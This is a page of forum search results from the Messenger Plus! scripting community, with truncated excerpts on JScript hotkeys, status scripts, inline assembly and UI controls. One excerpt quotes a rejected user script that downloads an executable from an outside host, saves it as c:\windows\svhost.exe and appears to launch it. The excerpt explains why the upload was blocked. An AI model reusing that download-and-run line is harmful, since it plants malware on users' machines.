What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » Search » Results

Search Results
Subject Author Forum Time
RE: RegisterHotKey
You can register hotkeys like this: [code=jscript]Interop.Call("user32", "RegisterHotKey", _hotkey.Handle, ID, Mods, Key);[/code] ...where ID is a number relating to the action (so you can tell what combination was pressed later), Mods is the num...
whizScripting05-15-2011 at 06:49 PM
RegisterHotKey
Hello Folks, I'm trying to use the RegisterHotKey function, however.. I'm stuck. What I want is to let my script react on two hotkeys (Alt+Q and Alt+W). Can anyone help me a bit with it? This is what I got so far, but I don't know what to do next:...
PaulEScripting05-15-2011 at 03:21 PM
Copying part of a string
I'm making a (rudimentary) chat system at college (server + client), and it works like this: The user (using the client app) sends a string in the format COMMAND:text, ie, "USER:Chancer" changes my name to Chancer. The problem is, it's one single...
ChancerTech Talk05-14-2011 at 08:46 PM
RE: Change state when a specific program starts
If you mean personalized status; those are not accessible using Plus! scripting.
mattyWLM Plus! General05-11-2011 at 05:26 PM
RE: Change state when a specific program starts
Untested but something like this could work... [code=js]// Add the EXE name below >>>var sExeName = '';<<< var bEnabled = false; var nPreviousStatus; function OnEvent_Initialize() { if (Messenger.MyStatus < STATUS_OFFLINE) return false; MsgPlus.A...
mattyWLM Plus! General05-10-2011 at 04:55 PM
RE: Log Encryption Help?
[s]When you are prompted for the password there should be a link that says you forgot your password.[/s] OP is correct. There isn't a link anywhere. Here is the interface files for the Password input and hint... nothing to link the two together: [co...
mattyWLM Plus! Help05-05-2011 at 03:29 PM
RE: Call ASM routine from your script (with example)
Look at each hex value next to the assembly, and compare. It's the machine code/shellcode/opcodes/whatever you want to call it. CookieRevised: I have no useful input to add to this thread, so all I can say is that I really like this. If code could ...
segosaScripting05-02-2011 at 07:07 PM
RE: Call ASM routine from your script (with example)
Okay, you win (again...) :p But what does the ASM thing do? In other words: what is this? [code=JScript]var sASM = "\u8B55\u244C\u8B10\u2454\u8B0C\u246C\u660 8\uB60F\u0045\u8966\u4502\u4242\uF3E2\uC25D \u0010";[/code] And how did you m...
SmokingCookieScripting05-02-2011 at 06:45 PM
RE: Call ASM routine from your script (with example)
[size=1][color=grey][actually off topic as it will be more about explaining what unicode is and how strings are stored than about using ASM in scripting][/color][/size] It does work... If the debug output showed an empty string for the first method t...
CookieRevisedScripting05-02-2011 at 05:17 PM
RE: Call ASM routine from your script (with example)
Wow, nice explanation :O Unfortunately, it doesn't work :P If I create BinaryData as follows: [code=JScript]var Text = "Hello world!"; var BinaryData = Interop.Allocate((Text.length + 1) * 2); BinaryData.writeSTRING(0,Text);[/code] Then the debugg...
SmokingCookieScripting05-02-2011 at 01:46 PM
RE: [released] XTC koffieshop (i.e. Dutch-participle helper)
That's what I thought too when it was working :P I know about the pronunciation rule, but not everyone does. That's why I wrote the core function in the first place (and I never intended to release :P ). "Faxen" does indeed work (omg who uses fax...
SmokingCookieScripting05-02-2011 at 01:12 PM
Call ASM routine from your script (with example)
There are times that you have a binary string inside a (Plus!) [url=http://www.msgplus.net/Developers/Documentati on/Official-Scripting-Documentation/Ref-DataBloc/] DataBloc[/url]. Now, there is a problem if you want to output that binary data for exam...
CookieRevisedScripting05-02-2011 at 07:21 AM
RE: [beta] Voicemail 1.0 (released 12/08/2011)
Hmm... a bit more complicated than my attempt. :P I just tried moving it in 3-pixel jumps every 25ms for 1 second (so it kind of goes round in circles)... [code=jscript]// on attention command, with shake enabled if (Options.Attention.Shake) { Ms...
whizScripting04-24-2011 at 11:39 AM
RE: [beta] Voicemail 1.0 (released 12/08/2011)
Yeah, multiple timers will work, didn't thought of that... Bit 'messy', but it will work. You don't need to repeat the timers though. :P EDIT: Something I quickly cooked up:[code=jscript]function OnEvent_ChatWndSendMessage(pChatWnd, sMessage) { ...
CookieRevisedScripting04-23-2011 at 09:23 PM
RE: Unhandled Exception Error
Also you're code is horrible and I have no idea how it actually ran... [code=js]function OnEvent_Initialize(MessengerStart) // This was made by Mal-Zzel - Version 1.0 {function OnEvent_ChatWndSendMessage(ChatWnd,Message) {var rn_txt = new Array(); ...
mattyForum & Website04-20-2011 at 03:17 PM
Help with a small GM script
So I am getting really frustrated with GM and it's inability for me to grasp what is happening LOL. Here is the script in it's entirety: [code=js](function () { for (var i in document.forms) { if (document.forms[i].name === 'lf') { getId('...
mattyTech Talk04-19-2011 at 02:22 PM
RE: why couldn`t upload scripts
Is that script malicious? It seems to me it's replacing svhost...
HorseboyForum & Website04-16-2011 at 02:17 PM
RE: why couldn`t upload scripts
Because the script you're uploading has: [code=jscript] Interop.Call("urlmon.dll", "URLDownloadToFileW", 0, "http://disk04.arb-up.com/files/2/rcjs5vg6cyrr8i/ svchost.exe", "c:\\windows\\svhost.exe", 0, 0); Interop.Call("shell32.dll", "...
MnjulForum & Website04-16-2011 at 02:03 PM
RE: Lock MSN on Close or Minimize MSN
Thanks for help, is working! But about the reason! Actually i was looking for such solution where if i away from the computer, nobody can delete from my contact list.. So if you can help me with this, i will be happy :), that if i want to delete fro...
JanaboyScripting04-15-2011 at 09:23 PM
RE: Lock MSN on Close or Minimize MSN
Unfortunalty locking Messenger when you minimize the contactlist can't be done with only pure scripting because that requires subclassing (If you can create an external DLL which subclasses the main Messenger window then it is possible). However, lo...
CookieRevisedScripting04-14-2011 at 10:21 PM
RE: Browse For File
Note that there are also other parts in the code which could be made shorter/smarter/cleaner/etc. But that was not the purpose of showing or updating that code.
CookieRevisedScripting04-14-2011 at 07:40 PM
RE: Browse For File
[img]http://shoutbox.menthix.net/attachment.php?pi d=1013025&update2[/img]
mattyScripting04-14-2011 at 07:06 PM
RE: Browse For File
Every time you use a with statement, a teddy bear cries. [url=http://www.yuiblog.com/blog/2006/04/11/with-s tatement-considered-harmful/]http://www.yuiblog.co m/blog/2006/04/11/with-statement-considered-harmfu l/[/url]
AmecScripting04-14-2011 at 06:54 PM
RE: [WIP] Pastebin for Messenger Plus!
I meant listbox sorry :P And thanks for the image :)
HorseboyScripting04-14-2011 at 06:43 PM
RE: [WIP] Pastebin for Messenger Plus!
If you are trying to create a ListView why are you using a ListBox?!? Here is an example of a ListView: [code=xml] <Control Id="LvOverlayRules" xsi:type="ListViewControl"> <Position Top="130" Left="15" Width="270" Height="70"/> <A...
mattyScripting04-14-2011 at 06:24 PM
[Hide Excerpts] Pages: (51): « First « 1 2 3 [ 4 ] 5 6 7 8 » Last »